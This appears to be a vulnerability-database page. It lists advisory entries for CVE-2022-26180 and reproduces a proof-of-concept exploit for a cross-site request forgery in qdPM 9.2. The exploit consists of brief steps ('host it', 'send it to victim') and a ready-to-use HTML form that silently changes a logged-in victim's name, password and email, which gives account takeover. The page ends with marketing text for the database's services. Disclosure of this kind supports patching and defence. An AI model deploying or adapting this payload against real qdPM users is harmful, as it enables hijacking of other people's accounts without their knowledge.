| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| qdPM 9.2 - Cross-site Request Forgery Vulnerability | 7 Apr 202200:00 | – | zdt | |
| CVE-2022-26180 | 8 Apr 202221:15 | – | attackerkb | |
| CVE-2022-26180 | 9 Apr 202200:13 | – | circl | |
| qdPM 跨站请求伪造漏洞 | 7 Apr 202200:00 | – | cnnvd | |
| CVE-2022-26180 | 8 Apr 202220:08 | – | cve | |
| CVE-2022-26180 | 8 Apr 202220:08 | – | cvelist | |
| EUVD-2022-30746 | 3 Oct 202520:07 | – | euvd | |
| CVE-2022-26180 | 8 Apr 202221:15 | – | nvd | |
| qdPM 9.2 Cross Site Request Forgery | 7 Apr 202200:00 | – | packetstorm | |
| Cross site request forgery (csrf) | 8 Apr 202221:15 | – | prion |
# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)
# Google Dork: NA
# Date: 03/27/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: KALI OS
# CVE : CVE-2022-26180
#
---------------
Steps to Exploit :
1) Make an HTML file of given POC (Change UserID field Accordingly)and host it.
2) send it to victim.
<html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST">
<input type="hidden" name="sf_method" value="put" />
<input type="hidden" name="users[id]" value="1" /> <!-- Change User ID Accordingly --->
<input type="hidden" name="users[photo_preview]" value="" />
<input type="hidden" name="users[name]" value="AggressiveUser" />
<input type="hidden" name="users[new_password]" value="TEST1122" />
<input type="hidden" name="users[email]" value="administrator@Lulz.com" />
<input type="hidden" name="users[photo]" value="" />
<input type="hidden" name="users[culture]" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation